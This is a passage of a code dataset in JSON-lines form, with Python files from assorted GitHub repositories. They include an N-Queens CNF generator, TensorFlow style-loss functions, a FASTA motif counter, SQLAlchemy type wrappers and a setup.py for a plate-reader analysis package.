exactly 3 heads in {n} coin tosses is {result:.8f}\")\n\n\nsimulated_results = bernoulli.rvs(result, size=1000000)\nsimulated_prob = np.mean(simulated_results)\ndata_bern = bernoulli.rvs(size=10,p=result)\nprint(f\"Simulated probability : {simulated_prob:.8f}\")\nprint(\"Samples generated:\",data_bern)\n","repo_name":"gadepall/digital-communication","sub_path":"exemplar/12/13/3/81/codes/prob6.py","file_name":"prob6.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"42095529113","text":"#!/usr/bin/env python\n\n# 8 Queens\n# RCRA - UDC - 03-02-17\n# Miguel Mosuera\n# miguel.mosuera.perez@udc.es\n# github.com/unrealmitch\n#\n# Description: 4..8..N Queens Solution for Clasp\n\nimport sys\n\ndef printboard(n):\n\toutput = \"\"\n\tfor i in range(0,n):\n\t\tfor j in range(0,n):\n\t\t\toutput += str(i*n+j+1).zfill(2) + \" \"\n\t\toutput += \"\\n\"\n\n\treturn output\t\t\n\ndef calcDiag(n):\n\trules = []\n\n\t#Top-> Left2Right\n\tfor i in range(0,n-1):\n\t\tfor j in range(0,n-1-i):\n\t\t\tfor k in range(j+1,n-i):\n\t\t\t\trule = []\n\t\t\t\trule.append(-(j*n+j+1+i))\n\t\t\t\trule.append(-(k*n+k+1+i))\n\t\t\t\trules.append(rule)\n\n\t#Bot-> Left2Right\n\tfor i in range(1,n-1):\n\t\tfor j in range(0,n-1-i):\n\t\t\tfor k in range(j+1,n-i):\n\t\t\t\trule = []\n\t\t\t\trule.append(-(n*i+j*n+j+1))\n\t\t\t\trule.append(-(n*i+n*k+k+1))\n\t\t\t\trules.append(rule)\n\n\t#Top-> R2L\n\tfor i in range(0,n-1):\n\t\tfor j in range(0,n-1-i):\n\t\t\tfor k in range(j+1,n-i):\n\t\t\t\trule = []\n\t\t\t\trule.append(-(j*n-j+n-i))\n\t\t\t\trule.append(-(k*n-k+n-i))\n\t\t\t\trules.append(rule)\n\n\t#Bot-> R2L\n\tfor i in range(1,n-1):\n\t\tfor j in range(0,n-1-i):\n\t\t\tfor k in range(j+1,n-i):\n\t\t\t\trule = []\n\t\t\t\trule.append(-(i*n+n+j*n-j))\n\t\t\t\trule.append(-(i*n+n+k*n-k))\n\t\t\t\trules.append(rule)\n\n\treturn rules\n\ndef calcCols(n):\n\trules = []\n\n\tfor i in range(0,n):\n\t\trule = []\n\n\t\tfor j in range(0,n):\n\t\t\trule.append((i+j*n)+1)\n\t\trules.append(rule);\n\n\n\t\tfor j in range(0,n-1):\n\t\t\tfor k in range(j+1,n):\n\t\t\t\trule = []\n\t\t\t\trule.append(-(j*n+1+i))\n\t\t\t\trule.append(-(k*n+1+i))\n\t\t\t\trules.append(rule)\n\n\treturn rules\n\ndef calcRows(n):\n\trules = []\n\n\tfor i in range(0,n):\n\t\trule = []\n\t\ts = i * n + 1 \t\t\t#Start of actual row\n\n\t\tfor j in range(0,n):\n\t\t\trule.append(s+j)\n\t\trules.append(rule);\n\n\n\t\tfor j in range(0,n-1):\n\t\t\tfor k in range(j+1,n):\n\t\t\t\trule = []\n\t\t\t\trule.append(-(s+j))\n\t\t\t\trule.append(-(s+k))\n\t\t\t\trules.append(rule)\n\n\treturn rules\n\ndef list2string(input):\n\toutput = \"\"\n\n\tfor rule in input:\n\t\tfor atom in rule:\n\t\t\toutput += str(atom).zfill(2) + \" \"\n\t\t\t#output += str(atom).rjust(2, '0') + \" \"\n\t\toutput += \"0 \\n\"\n\n\treturn output\n\ndef genNqueen(n):\n\n\trows = calcRows(n)\n\tcols = calcCols(n)\n\tdiag = calcDiag(n)\n\n\tn_rules = len(rows) + len(cols) + len(diag)\n\tn_atoms = n*n\n\n\toutput = \"c NQUEENS: \" + str(n) \n\toutput += \"\\np cnf \" + str(n_atoms) + \" \" + str(n_rules) + \"\\n\"\n\toutput += \"\\nc Rows:\\n\" + list2string(rows)\n\toutput += \"\\nc Colums:\\n\" + list2string(cols)\n\toutput += \"\\nc Diagonals:\\n\" + list2string(diag)\n\n\tprint(printboard(n))\n\tprint(list2string(rows))\n\tprint(list2string(cols))\n\tprint(list2string(diag))\n\n\treturn output\n\ndef main():\n\tif len(sys.argv) < 2:\n\t\tprint(\"Error: How many queens? [Missing arg1: command n_queens file_output]\")\n\t\tsys.exit(0)\n\telse:\n\t\toutput = genNqueen(int(sys.argv[1]))\n\t\tif len(sys.argv) > 2:\n\t\t\toutfile = open(sys.argv[2], 'w')\n\t\t\toutfile.write(output)\n\t\t\toutfile.close()\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"unrealmitch/FIC","sub_path":"RCRA/Practicas/nqueen/nqueen.py","file_name":"nqueen.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"32554494433","text":"for t in range(1,int(input())+1):\n map = []\n max_len = 0\n for i in range(5):\n tmp = input()\n map.append(tmp)\n if len(tmp) > max_len:\n max_len = len(tmp)\n b = ''\n for i in range(max_len):\n for j in map:\n if len(j) <= i:\n continue\n b += j[i]\n print(f'#{t} {b}')","repo_name":"jbsam2/algo_problem","sub_path":"swea/D3/5356. 의석이의 세로로 말해요.py","file_name":"5356. 의석이의 세로로 말해요.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73817300026","text":"try:\r\n __SLYCOT_SETUP__\r\nexcept NameError:\r\n __SLYCOT_SETUP__ = False\r\n\r\n\r\nif __SLYCOT_SETUP__:\r\n import sys as _sys\r\n _sys.stderr.write('Running from Slycot source directory.\\n')\r\n del _sys\r\nelse:\r\n\r\n # import slycot.examples\r\n\r\n # The Slycot library is organised by 11-chapters. Each chapter can be identified by a single letter.\r\n # The following chapters are included:\r\n # A : Analysis Routines (included)\r\n # B : Benchmark\r\n # C : Adaptive Control\r\n # D : Data Analysis\r\n # F : Filtering\r\n # I : Identification\r\n # M : Mathematical Routines (included)\r\n # N : Nonlinear Systems\r\n # S : Synthesis Routines (included)\r\n # T : Transformation Routines (included)\r\n # U : Utility Routines\r\n\r\n\r\n # Analysis routines (17/60 wrapped)\r\n from .analysis import (ab01nd,\r\n ab04md,\r\n ab05md, ab05nd,\r\n ab07nd,\r\n ab08nd, ab08nz,\r\n ab09ad, ab09ax, ab09bd, ab09md, ab09nd,\r\n ab13bd, ab13dd, ab13ed, ab13fd, ab13md)\r\n\r\n # Benchmark routines (0/6 wrapped)\r\n\r\n # Adaptive control routines (0/0 wrapped)\r\n\r\n # Data analysis routines (0/8 wrapped)\r\n\r\n # Filtering routines (0/6 wrapped)\r\n\r\n # Identification routines (0/15 wrapped)\r\n\r\n # Mathematical routines (8/281 wrapped)\r\n from .math import (mb02ed, mb03rd, mb03vd, mb03vy, mb03wd,\r\n mb05md, mb05nd,\r\n mc01td)\r\n\r\n # Nonlinear Systems (0/16 wrapped)\r\n\r\n # Synthesis routines ((16+1)/131 wrapped), sb03md57 is not part of slicot\r\n from .synthesis import (sb01bd,\r\n sb02md, sb02mt, sb02od,\r\n sb03md, sb03md57, sb03od,\r\n sb04md, sb04qd,\r\n sb10ad, sb10dd, sb10fd, sb10hd, sb10yd,\r\n sg02ad,\r\n sg03ad, sg03bd)\r\n\r\n # Transformation routines (10/77 wrapped)\r\n from .transform import (tb01id, tb01pd,\r\n tb03ad,\r\n tb04ad,\r\n tb05ad,\r\n tc01od, tc04ad,\r\n td04ad,\r\n tf01md, tf01rd)\r\n\r\n # Utility routines (0/7 wrapped)\r\n\r\n\r\n from .version import __version__\r\n\r\n\r\ndef test():\r\n import pytest\r\n pytest.main(['--pyargs', 'slycot'])\r\n","repo_name":"python-control/Slycot","sub_path":"slycot/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"6"} +{"seq_id":"71145447867","text":"from __future__ import print_function\nimport functools\nimport vgg, pdb, time\nimport tensorflow as tf, numpy as np, os\nimport transform\nfrom utils import save_img, get_img, exists, list_files\nimport cv2\n\nvgg_path = '/media/xc/c728432c-8ae3-4aeb-b43d-9ef02faac4f8/GAN-UNet/data/imagenet-vgg-verydeep-19.mat'\n\nSTYLE_LAYERS = ('relu1_1', 'relu2_1', 'relu3_1', 'relu4_1', 'relu5_1')\nCONTENT_LAYER = ('relu4_2',)\n\n\n'''\n###get the style features of style images\n'''\ndef get_style_features(style_img):\n\n image = tf.multiply(style_img + 1, 127.5)\n\n if image._shape_as_list()[1] != 128:\n image = tf.image.resize_images(image,[128, 128])\n\n style_features = {}\n\n style_image_pre = vgg.preprocess(image)\n net = vgg.net(vgg_path, style_image_pre)\n\n for layer in STYLE_LAYERS:\n features = net[layer] #.eval(feed_dict={style_img: style_image_pre})\n features = tf.reshape(features, shape=[-1, features._shape_as_list()[1]*features._shape_as_list()[2], features._shape_as_list()[3]])[0]\n gram = tf.matmul(tf.transpose(features), features) / float(features._shape_as_list()[0]*features._shape_as_list()[1])\n style_features[layer] = gram\n\n return style_features\n\n\n'''\n### get the content features of content images\n'''\ndef get_content_features(content_img):\n\n image = tf.multiply(content_img + 1, 127.5)\n\n if image._shape_as_list()[1] != 128:\n image = tf.image.resize_images(image, [128, 128])\n\n content_features = {}\n\n X_pre = vgg.preprocess(image)\n content_net = vgg.net(vgg_path, X_pre)\n\n for layer in CONTENT_LAYER:\n content_features[layer] = content_net[layer] #.eval(feed_dict={content_img: X_pre})\n\n return content_features\n\n\n'''\n### get the style loss by calculating the difference \nbetween the style_image and genetated image\n'''\ndef get_style_loss(style_features, style_img):\n\n style_img_features = get_style_features(style_img)\n\n style_lossE = 0\n for style_layer in STYLE_LAYERS:\n coff = float(1.0 / len(STYLE_LAYERS))\n img_gram = style_img_features[style_layer]\n style_gram = style_features[style_layer]\n style_lossE += coff * tf.reduce_mean(tf.abs(img_gram - style_gram))\n\n\n style_loss = tf.reduce_mean(style_lossE)\n\n return style_loss\n\n\n'''\n### get the content loss by calculating the difference \n between the synthesized image and genetated image\n'''\ndef get_content_loss(img, syn_img):\n\n img_features = get_content_features(img)\n syn_features = get_content_features(syn_img)\n\n content_lossE = 0\n for content_layer in CONTENT_LAYER:\n coff = float(1.0 / len(CONTENT_LAYER))\n img_content = img_features[content_layer]\n syn_content = syn_features[content_layer]\n content_lossE += coff * tf.reduce_mean(tf.abs(img_content - syn_content))\n\n content_loss = tf.reduce_mean(content_lossE)\n\n return content_loss\n\n\n'''\n### get the total variation loss\n'''\ndef get_tv_loss(preds):\n\n img = preds\n\n tv_loss = tf.reduce_mean(tf.abs(img[:, 1:, :, :] - img[:, :-1, :, :])) + \\\n tf.reduce_mean(tf.abs(img[:, :, 1:, :] - img[:, :, :-1, :]))\n\n return tv_loss\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"xiezhongzhao/GAN-and-Style-Transfer-Hand-Pose-Estimation","sub_path":"src/StyleFeature.py","file_name":"StyleFeature.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"19315654160","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 1 21:22:02 2022\n\n@author: Nicholas Nikolov\n\"\"\"\nimport os\n\nos.chdir(\"C:\\\\Users\\\\nikol\\\\OneDrive\\\\Professional\\\\Learning\\\\2022-Financial_Scrape_and_Forecast\")\n\nimport src.etl_methods as etl\nimport src.sentiment_analysis as sa\n\nparameters = etl.get_parameters()\n\ndef run_data_populater(parameters):\n print(\"Running run_data_populater\")\n \n '''\n Main method for populating extracted data into the DB.\n '''\n \n # Declare the variables\n data_list = parameters['data_list']\n ticker_symbols = parameters[\"ticker_symbols\"]\n \n # Update the DB dict\n etl.update_ticker_symbols_db(ticker_symbols)\n \n # The data dictionary containing the base Yahoo! Finance data\n return_dict = etl.generate_data_dict(data_list , ticker_symbols)\n \n # Zenserp \n zenserp_dict = etl.generate_zenserp_dict(ticker_symbols)\n \n # Sentiment Analysis\n sentiment_dict = sa.determine_sentiments_from_dict(zenserp_dict)\n \n # Computes the sentiment averages by sentiment level\n sentiment_averages = sa.compute_sentiment_averages(sentiment_dict)\n \n # Merges sentiment_averages to the return_dict\n merged_data = etl.merge_data(return_dict , sentiment_averages)\n \n # Uploads all scraped data to the DB\n upload_query = etl.upload_extracted_data(merged_data)\n \n return return_dict\n\n\ntest = run_data_populater(parameters)\n\n# {'neu':'1'}","repo_name":"NicholasNikolov/2022-FinancialModeling","sub_path":"run/run_data_populater.py","file_name":"run_data_populater.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5144973461","text":"#!/usr/bin/env python3\n\nimport argparse\nimport collections\nimport os\n\nDEFAULT_MOTIF_DIR = \"motifs_py\"\nDEFAULT_MOTIF_COUNT = \"motif_count_py.txt\"\n\nFastaEntry = collections.namedtuple(\"FastaEntry\", [\"desc\", \"seq\"])\n\ndef get_fasta_entry(f):\n \"\"\"Generator - produces a description and sequence line from a fasta\n\n Args:\n f (file handle): handle to fasta file\n\n Yields:\n FastaEntry: NamedTuple of desc and seq\n \"\"\"\n desc = f.readline()\n while desc:\n seq = f.readline()\n result = FastaEntry(desc, seq)\n yield result\n desc = f.readline()\n\ndef main():\n \"\"\"main\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Count motifs in a fasta\")\n parser.add_argument(\"fasta_file\", help=\"fasta file\")\n parser.add_argument(\"motifs_file\", help=\"text file of motifs to search for\")\n parser.add_argument(\"-d\", \"--motif-dir\", dest=\"motif_dir\", default=DEFAULT_MOTIF_DIR, help=\"directory to save motif fastas\")\n parser.add_argument(\"-c\", \"--motif-count\", dest=\"motif_count\", default=DEFAULT_MOTIF_COUNT, help=\"file to save motif counts\")\n args = parser.parse_args()\n\n os.makedirs(args.motif_dir)\n\n motif_count = collections.OrderedDict()\n motif_matches = collections.OrderedDict()\n\n with open(args.motifs_file) as f:\n for motif in f:\n motif_count[motif.strip()] = 0\n motif_matches[motif.strip()] = []\n \n with open(args.fasta_file) as f:\n entry_gen = get_fasta_entry(f)\n for entry in entry_gen:\n for motif in motif_count:\n matches = entry.seq.count(motif)\n if matches > 0:\n motif_count[motif] += matches\n motif_matches[motif].append(entry)\n \n with open(args.motif_count, \"w\") as f:\n for motif in motif_count:\n f.write(\"{} {}\\n\".format(motif, motif_count[motif]))\n\n for motif in motif_matches:\n with open(os.path.join(args.motif_dir, \"{}.fasta\".format(motif)), \"w\") as f:\n for entry in motif_matches[motif]:\n f.write(entry.desc)\n f.write(entry.seq)\n\nif __name__ == \"__main__\":\n main()","repo_name":"rjrico510/rbif100","sub_path":"week2/scripts/python/week2.py","file_name":"week2.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26248010076","text":"from delfin.leader_election.tooz.callback import ToozLeaderElectionCallback\nfrom delfin.leader_election.tooz.leader_elector import Elector\nfrom delfin.task_manager.scheduler.schedule_manager import SchedulerManager\n\nLEADER_ELECTION_KEY = \"delfin-performance-metric-collection\"\n\n\nclass LeaderElectionFactory:\n\n @staticmethod\n def construct_elector(plugin, leader_key=None):\n \"\"\"\n Construct leader election elector based on specified plugin\n\n :param string plugin: required plugin for leader election\n \"\"\"\n # Maintain a unique key for metric collection leader election\n leader_election_key = LEADER_ELECTION_KEY\n if leader_key:\n leader_election_key = leader_key\n\n scheduler_mgr = SchedulerManager()\n\n if plugin == \"tooz\":\n scheduler_mgr.start()\n # Create callback object\n callback = ToozLeaderElectionCallback.register(\n on_leading_callback=scheduler_mgr.schedule_boot_jobs,\n on_stop_callback=scheduler_mgr.stop)\n\n return Elector(callback, leader_election_key)\n else:\n raise ValueError(plugin)\n","repo_name":"sodafoundation/delfin","sub_path":"delfin/leader_election/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":201,"dataset":"github-code","pt":"6"} +{"seq_id":"69999261628","text":"import unittest\nimport faiss\n\nfrom spdb import utils\n\nclass TestGetNumClusters(unittest.TestCase):\n\n test_cases = [\n (10000, 200),\n (1000000, 6324),\n (100000000, 200000),\n ]\n def test__get_num_clusters(self):\n for num_vectors, expected_num_clusters in self.test_cases:\n with self.subTest(num_vectors=num_vectors, expected_num_clusters=expected_num_clusters):\n num_clusters = utils.get_num_clusters(num_vectors)\n self.assertEqual(num_clusters, expected_num_clusters)\n\n\nclass TestGetNProbe(unittest.TestCase):\n\n test_cases = [\n (200, 100),\n (1000, 250),\n (6350, 444),\n (200000, 6000),\n ]\n def test__get_n_probe(self):\n for num_clusters, expected_n_probe in self.test_cases:\n with self.subTest(num_clusters=num_clusters, expected_n_probe=expected_n_probe):\n n_probe = utils.get_n_probe(num_clusters)\n self.assertEqual(n_probe, expected_n_probe)\n\n\nclass TestGetTrainingMemoryUsage(unittest.TestCase):\n\n ### Test get_training_memory_usage ###\n def test__get_training_memory_usage(self):\n memory_usage = utils.get_training_memory_usage(vector_dimension = 768, num_vectors = 100000)\n self.assertEqual(memory_usage, 921600000)\n\n\nclass TestGetNumBatches(unittest.TestCase):\n\n ### Test get_num_batches ###\n def test__get_num_batches(self):\n num_batches = utils.get_num_batches(num_vectors = 1000000, vector_dimension = 768, max_memory_usage = 4*1024*1024*1024)\n self.assertEqual(num_batches, 3)\n\n\nclass TestDetermineOptimalTrainingMethod(unittest.TestCase):\n\n ### Test determine_optimal_training_method ###\n def test__is_two_level_clustering_optimal__clustering(self):\n # 5M vectors\n use_two_level_clustering = utils.is_two_level_clustering_optimal(max_memory_usage = 4*1024*1024*1024, vector_dimension = 768, num_vectors = 5000000)\n self.assertEqual(use_two_level_clustering, True)\n \n def test__is_two_level_clustering_optimal__subsampling(self):\n # 1M vectors\n use_two_level_clustering = utils.is_two_level_clustering_optimal(max_memory_usage = 4*1024*1024*1024, vector_dimension = 768, num_vectors = 1000000)\n self.assertEqual(use_two_level_clustering, False)\n\n\nclass TestCalculateTrainedIndexCoverageRatio(unittest.TestCase):\n\n # Create a list of 1000 vectors from 0 to 999\n lmdb_ids = range(1000)\n # Create a list of 100 vectors from 0 to 99\n saved_index_ids = range(100)\n\n ### Partial coverage ###\n def test__calculate_trained_index_coverage_ratio__with_saved_index(self):\n coverage_ratio = utils.calculate_trained_index_coverage_ratio(self.lmdb_ids, self.saved_index_ids)\n self.assertEqual(coverage_ratio, 0.1)\n \n ### Full coverage ###\n def test__calculate_trained_index_coverage_ratio__with_saved_index(self):\n coverage_ratio = utils.calculate_trained_index_coverage_ratio(self.saved_index_ids, self.lmdb_ids)\n self.assertEqual(coverage_ratio, 1)\n\n ### No saved ids (case where an index hasn't been trained yet) ###\n def test__calculate_trained_index_coverage_ratio__no_saved_index(self):\n coverage_ratio = utils.calculate_trained_index_coverage_ratio(self.lmdb_ids, [])\n self.assertEqual(coverage_ratio, 0)\n \n ### No lmdb ids (case where someone removed all vectors, but previously trained an index) ###\n def test__calculate_trained_index_coverage_ratio__no_lmdb_ids(self):\n coverage_ratio = utils.calculate_trained_index_coverage_ratio([], self.saved_index_ids)\n self.assertEqual(coverage_ratio, 0)\n use_two_level_clustering = utils.is_two_level_clustering_optimal(max_memory_usage = 4*1024*1024*1024, vector_dimension = 768, num_vectors = 1000000)\n self.assertEqual(use_two_level_clustering, False)\n\n\nclass TestCheckIsFlatIndex(unittest.TestCase):\n \n def test__check_is_flat_index__True(self):\n faiss_index = faiss.IndexFlat(768)\n faiss_index = faiss.IndexIDMap(faiss_index)\n is_index_flat = utils.check_is_flat_index(faiss_index)\n self.assertTrue(is_index_flat)\n \n def test__check_is_flat_index__False(self):\n faiss_index = faiss.index_factory(768, \"PCA256,IVF4096,PQ32\")\n is_index_flat = utils.check_is_flat_index(faiss_index)\n self.assertFalse(is_index_flat)\n","repo_name":"Rumman954/spDB","sub_path":"tests/unit/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72784324987","text":"# https://www.codewars.com/kata/643a47fadad36407bf3e97ea\n\ndef encode_cd(n):\n bitmask = f'{n:b}'.zfill(8)[::-1]\n res = 'P'\n prev = res\n for x in bitmask:\n if x == '0':\n res+=prev\n else:\n if prev == 'P':\n res+='L' \n else:\n res+='P'\n prev = res[-1]\n return res\n","repo_name":"blzzua/codewars","sub_path":"7-kyu/encode_data_on_cd_compact_disc_surface.py","file_name":"encode_data_on_cd_compact_disc_surface.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14255890546","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom _MOM import MOM\nfrom _TFL import TFL\nfrom _TFL.pyk import pyk\n\nfrom _MOM._DBW._SAW import SA\nimport _MOM._Attr.Type\n\nimport _TFL._Meta.Object\nimport _TFL._Meta.Property\n\nimport datetime\n\nclass _Id_Entity_ (SA.types.TypeDecorator) :\n \"\"\"Augmented integer type that converts entities to pids\"\"\"\n\n def process_bind_param (self, value, dialect) :\n return getattr (value, \"pid\", value)\n # end def process_bind_param\n\n# end class _Id_Entity_\n\nclass _Time_X_ (SA.types.TypeDecorator) :\n \"\"\"Augmented time type that stores time values as datetime values\"\"\"\n\n impl = SA.types.DateTime\n _fake_date = datetime.date (1, 1, 1)\n\n @TFL.Meta.Class_and_Instance_Method\n def process_bind_param (soc, value, dialect) :\n if isinstance (value, datetime.time) :\n value = datetime.datetime.combine (soc._fake_date, value)\n return value\n # end def process_bind_param\n\n def process_result_value (self, value, dialect) :\n if isinstance (value, datetime.datetime) :\n value = value.time ()\n return value\n # end def process_result_value\n\n# end class _Time_X_\n\nclass _Type_Name_Integer_ (SA.types.TypeDecorator) :\n \"\"\"Augmented integer type that converts MOM type_names to/from integers\"\"\"\n\n _MOM_ATW = None\n impl = SA.types.SmallInteger\n\n def process_bind_param (self, value, dialect) :\n tn_map = self._MOM_ATW.tn_map\n if value is None :\n value = -1\n elif isinstance (value, pyk.string_types) :\n value = tn_map [value]\n return value\n # end def process_bind_param\n\n def process_result_value (self, value, dialect) :\n if isinstance (value, pyk.int_types) :\n tn_map = self._MOM_ATW.tn_map\n return tn_map [value] if value >= 0 else None\n elif value is not None :\n return str (value)\n # end def process_result_value\n\n# end class _Type_Name_Integer_\n\nclass M_SA_Type (TFL.Meta.Object.__class__) :\n \"\"\"Encapsulate SQLalchemy types\"\"\"\n\n @TFL.Meta.Once_Property\n def P_Int_Types (cls) :\n \"\"\"Map (`min_value`, `max_value`) tuples to SA integer types\"\"\"\n _AI = MOM.Attr._A_Int_\n return \\\n ( (_AI.min_value_16, _AI.max_value_16, cls.SmallInteger)\n , (_AI.min_value_32, _AI.max_value_32, cls.Integer)\n , (_AI.min_value_64, _AI.max_value_64, cls.BigInteger)\n )\n # end def P_Int_Types\n\n @TFL.Meta.Once_Property\n def P_Type_Map (cls) :\n \"\"\"Map python types to SA types\"\"\"\n return \\\n { bool : cls.Boolean\n , datetime.date : cls.Date\n , datetime.datetime : cls.DateTime\n , datetime.time : cls.Time\n , float : cls.Float\n }\n # end def P_Type_Map\n\n def __getattr__ (cls, name) :\n if name.startswith (\"__\") and name.endswith (\"__\") :\n ### Placate inspect.unwrap of Python 3.5,\n ### which accesses `__wrapped__` and eventually throws `ValueError`\n return getattr (self.__super, name)\n result = getattr (SA.types, name)\n setattr (cls, name, result)\n return result\n # end def __getattr__\n\n# end class M_SA_Type\n\nclass SA_Type (TFL.Meta.BaM (TFL.Meta.Object, metaclass = M_SA_Type)) :\n \"\"\"Encapsulate SQLalchemy types\"\"\"\n\n _Time_X_ = _Time_X_\n _Type_Name_ = _Type_Name_Integer_\n\n Decimal = SA.types.Numeric\n\n def __init__ (self, ATW) :\n self._ATW = ATW\n # end def __init__\n\n @TFL.Meta.Once_Property\n def Id_Entity (self) :\n \"\"\"Augmented integer type that converts entities to pids\"\"\"\n ATW = self._ATW\n ET = ATW.app_type [\"MOM.Id_Entity\"]\n pid = ET.pid\n return _Id_Entity_.__class__ \\\n ( str (\"Id_Entity\"), (_Id_Entity_, )\n , dict (impl = self.sized_int_type (pid.Pickled_Type))\n )\n # end def Id_Entity\n\n def sized_int_type (self, pts) :\n \"\"\"Return the smallest SA integer type that can hold\n (`pts.min_value`, `pts.max_value`)\n \"\"\"\n result = None\n _AI = MOM.Attr._A_Int_\n max_value = pts.max_value or _AI.max_value_32\n min_value = pts.min_value or _AI.min_value_32\n for tmin, tmax, result in self.P_Int_Types :\n if tmin <= min_value < max_value <= tmax :\n break\n else :\n raise TypeError \\\n ( \"Cannot map integer type with max-value %d and min-value %d \"\n \"to a database type\"\n % (max_value, min_value)\n )\n return result\n # end def sized_int_type\n\n @TFL.Meta.Once_Property\n def Type_Name (self) :\n \"\"\"Augmented integer type that converts MOM type_names to/from integers\"\"\"\n return self._Type_Name_.__class__ \\\n ( str (\"Type_Name\"), (self._Type_Name_, )\n , dict (_MOM_ATW = self._ATW)\n )\n # end def Type_Name\n\n def __getattr__ (self, name) :\n if name.startswith (\"__\") and name.endswith (\"__\") :\n ### Placate inspect.unwrap of Python 3.5,\n ### which accesses `__wrapped__` and eventually throws `ValueError`\n return getattr (self.__super, name)\n result = getattr (self.__class__, name)\n setattr (self, name, result)\n return result\n # end def __getattr__\n\n# end class SA_Type\n\nif __name__ != \"__main__\" :\n MOM.DBW.SAW._Export (\"SA_Type\")\n### __END__ MOM.DBW.SAW.SA_Type\n","repo_name":"xiaochang91/tapyr","sub_path":"_MOM/_DBW/_SAW/SA_Type.py","file_name":"SA_Type.py","file_ext":"py","file_size_in_byte":5753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"580247968","text":"import time\n\n\ndef decorator(func):\n def wrapper(*args, **kwargs):\n timer = time.time()\n result = func(*args, **kwargs)\n print(f'Функция отработала за время: {time.time() - timer}\\nБыли вызваны аргументы:\\n{args}\\n{kwargs}\\nРезультат:{result}')\n return result\n return wrapper\n\n\n@decorator\ndef summa(*args):\n sum = 0\n for arg in args:\n sum += arg\n return sum\n\n\nsumma(1, 2, 4, 5)\n","repo_name":"MrDumper/Roma","sub_path":"9.1HW.py","file_name":"9.1HW.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"20269910094","text":"\"\"\"\nGATHODE: Growth Analysis Tool for High-throughput Optical Density Experiments\n\nGATHODE is a software package for analysing time series of optical\ndensity measurements that were recorded with the help of a plate\nreader. It allows to extract growth parameters such as maximal growth\nrate, lag-time and growth yield.\n\"\"\"\n\nimport sys\nfrom setuptools import setup, find_packages\n\npackagedir = 'platereader'\nversion_py = packagedir+'/_version.py'\n\ndef getVersion():\n \"\"\" get the version from the file _version.py \"\"\"\n try:\n fh=open(version_py, 'r')\n version=fh.read().strip().split('=')[-1].replace(\"'\",'').lstrip()\n fh.close()\n except:\n return None\n\n return version\n\ndef genericSetupDict(app='both'):\n genericSetupOpts=dict(\n name = app,\n version = getVersion(),\n packages = [packagedir, packagedir+'/parser'],\n # NOTE PyQt4 is not installable via pip, so this dependency is not listed here\n install_requires = [\"numpy\",\"scipy\",\"matplotlib\"],\n\n author = \"Nils Christian\",\n author_email = \"nils.christian@uni.lu\",\n url = \"https://platereader.github.io/\",\n license = \"AGPL\",\n classifiers=[\n 'Intended Audience :: Science/Research',\n 'Environment :: Console',\n 'Environment :: MacOS X',\n 'Environment :: Win32 (MS Windows)',\n 'Environment :: X11 Applications :: Qt',\n 'License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n ],\n keywords = \"plate reader, optical density, growth curve\",\n )\n if app == 'both':\n genericSetupOpts['name'] = 'GATHODE'\n genericSetupOpts['description'] = \"\"\"Growth and Chronological Life Span Analysis Tools for High-throughput\nOptical Density Experiments (GATHODE/CATHODE)\"\"\"\n genericSetupOpts['long_description'] = \"\"\"\nThe Growth Analysis Tool for High-throughput Optical Density\nExperiments (GATHODE) is a software package for analysing time series\nof optical density measurements that were recorded with the help of a\nplate reader. It allows to extract growth parameters such as maximal\ngrowth rate, lag-time and growth yield.\nThe Chronological Life Span is defined as the time cells can survive\nin a non-dividing state. The Chronological life span Analysis Tool for\nHigh-throughput Optical Density Experiments (CATHODE) uses multiple\noutput files of GATHODE to analyse this survival.\"\"\"\n\n elif app == 'GATHODE':\n genericSetupOpts['description'] = \"Growth Analysis Tool for High-throughput Optical Density Experiments (GATHODE)\"\n genericSetupOpts['long_description'] = \"\"\"\nThe Growth Analysis Tool for High-throughput Optical Density\nExperiments (GATHODE) is a software package for analysing time series\nof optical density measurements that were recorded with the help of a\nplate reader. It allows to extract growth parameters such as maximal\ngrowth rate, lag-time and growth yield.\"\"\"\n\n elif app == 'CATHODE':\n genericSetupOpts['description'] = \"Chronological life span Analysis Tool for High-throughput Optical Density Experiments (CATHODE)\"\n genericSetupOpts['long_description'] = \"\"\"\nThe Chronological Life Span is defined as the time cells can survive\nin a non-dividing state. The Chronological life span Analysis Tool for\nHigh-throughput Optical Density Experiments (CATHODE) uses multiple\noutput files of the Growth Analysis 